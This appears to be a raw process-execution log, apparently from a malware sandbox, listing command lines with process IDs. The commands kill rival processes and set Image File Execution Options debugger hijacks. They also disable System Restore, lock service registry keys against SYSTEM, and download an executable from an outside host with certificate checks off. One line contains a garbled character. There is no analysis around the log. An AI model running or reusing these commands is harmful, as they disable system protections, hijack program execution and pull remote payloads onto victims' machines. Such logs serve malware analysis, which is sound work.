taskkill.exe taskkill /f /im ipz.exe
2184taskkill.exe taskkill /f /im ipz2.exe
2284taskkill.exe taskkill /f /im nvidsrv.exe
2372taskkill.exe taskkill /f /im safesurf.exe /T
2456taskkill.exe taskkill /f /im surfguard.exe
2520reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "UseWUServer" /t REG_DWORD /d "0" /f
2584reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmisrv.exe" /f
2628reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmsdll.exe" /f
2672reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\amsql.exe" /f
2716reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\slscv.exe" /f
2760reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fturl.exe" /f
2808reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wdgmgr.exe" /f
2852reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ams.exe" /f
2896reg.exe reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f
2940subin.exe subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xStarter /deny=SYSTEM=F
2984subin.exe subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ProgramService /deny=SYSTEM=F
3032subin.exe subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ddns /deny=SYSTEM=F
1684sc.exe sc stop xStarter
2096subin.exe subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Bios /deny=SYSTEM=F
2188wmild.exe wmild.exe -c http://openslowmo.com/img/icons/SURFSET.exe --no-check-certificate
2340reg.exe reg delete HKLM\SOFTWARE\JetSwap /f
2820reg.exe reg delete HKCU\SOFTWARE\JetSwap /f
2892net1.exe C:\Windows\system32\net1 stop xStarter
3024reg.exe Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Wasppacer.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f
2068reg.exe Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\waagent.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f
2236reg.exe Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wasub.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f
204reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d "1" /f
2484reg.exe reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr" /v Start /t REG_DWORD /d "4" /f
1668taskkill.exe taskkill /f /im wuau𫲮exe /T
2332taskkill.exe taskkill /f /im wuapp.exe /T
2812taskkill.exe taskkill /f /im waagent.exe /T
2980taskkill.exe taskkill /f /im wups.exe /T
2212taskkill.exe taskkill /f /im wudriver.exe /T
2352taskkill.exe taskkill /f /im stub.exe
2088net1.exe C:\Windows\system32\net1 stop xStarter
2052sc.exe sc stop xStarter
2092